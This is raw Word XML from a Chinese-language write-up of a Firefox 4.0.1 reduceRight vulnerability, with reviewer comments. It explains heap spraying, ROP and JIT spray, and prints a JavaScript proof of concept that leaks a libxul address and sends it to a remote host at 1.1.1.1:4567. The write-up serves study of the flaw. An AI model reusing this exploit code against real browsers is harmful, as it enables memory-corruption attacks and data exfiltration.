      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F382B54" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E2FEF3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="439"/>
      </w:pPr>
      <w:r>
        <w:t>在没有DEP的系统上利用此漏洞很简单。攻击者所需要做的就是用标记为JSVAL_TYPE_OBJECT类型的伪Value结构将asPtr成员设置为熟悉的堆喷涂值0x0c0c0c0c来对堆进行喷涂，然后从传递给reduceRight方法的当前变量中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>触发任何方法</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B640D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1500" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681A3444" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="568"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用此漏洞来实现信息泄漏也是微不足道的。以下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将泄漏32位Linux上Firefox 4.0.1上的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>libxul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>地址，并将其发送到远程主机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505403F9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDF9C8A" w14:textId="56E4525F" w:rsidR="0026102A" w:rsidRDefault="005D386D" w:rsidP="005D386D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new Array;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xyz.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 4294967240;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">a = function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>prev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>indx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, array) {</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>typeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> current == "number" || current != "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NaN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>" &amp;&amp; current !=</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>"undefined")</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">r = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>('GET', 'http://1.1.1.1:4567/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s?t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>typeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> + '&amp;v=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>false);</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(null);</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xyz.reduceRight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(a,1,2,3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038F9FB" w14:textId="77777777" w:rsidR="005D386D" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798500B8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="422"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>使用JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>利用此漏洞并非易事，但完全有可能。如上所述，该漏洞除了执行任意代码外，还允许信息泄漏</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们可以使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>libxul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息泄漏将伪造的对象结构</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>asPtr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成员设置为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>libxul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中的堆栈透视小工具，将堆栈指针指向我们的ROP链，然后将shellcode复制到现有的RWX JIT页面中。或者，我们可以通过JIT Spray强制分配许多包含常量的JIT页面，这些常量将我们的shellcode串在一起，并通过向堆中喷洒带有伪造Value对象的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>asPtr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成员指向常量之一的伪Value对象来执行执行，这是可预期的。 JIT页面。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0026102A">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="12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宗泽 江" w:date="2020-07-05T15:01:00Z" w:initials="宗泽">
    <w:p w14:paraId="58CED959" w14:textId="48624CDF" w:rsidR="004D275C" w:rsidRDefault="004D275C" w:rsidP="004D275C">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个漏洞倒不是很常见，不过这个漏洞能做很多有意思的事情，可以抬</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，并且可以控制RFLAGS</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="13" w:author="宗泽 江" w:date="2020-07-05T15:20:00Z" w:initials="宗泽">
    <w:p w14:paraId="289E5438" w14:textId="32754895" w:rsidR="00A5797A" w:rsidRDefault="00A5797A">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就是说ROP到JIT生成的代码处嘛</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CED959" w15:done="0"/>
  <w15:commentEx w15:paraId="289E54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C69C1" w16cex:dateUtc="2020-07-05T07:01:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="22AC6E5A" w16cex:dateUtc="2020-07-05T0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CED959" w16cid:durableId="22AC69C1"/>
  <w16cid:commentId w16cid:paraId="289E5438" w16cid:durableId="22AC6E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D42A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86B08D24"/>
    <w:lvl w:ilvl="0" w:tplc="FFA6156E">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A06A9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3CBA3C7C"/>
    <w:lvl w:ilvl="0" w:tplc="BCA0D660">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="880" w:hanging="194"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C8EC8200">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1600" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-25"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A16E829E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1600" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="778C977A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2642" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A14A3964">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3685" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="11AEC0A8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4727" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8D34A5CC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5770" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F0C45382">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6812" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="23FCDE3E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7855" w:hanging="134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="584C1C14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7AA9038"/>
    <w:lvl w:ilvl="0" w:tplc="3E583338">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="880" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:i/>
        <w:spacing w:val="-14"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="684CA530">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1786" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B22A98AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2692" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ED80E35E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3598" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2C0040D0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
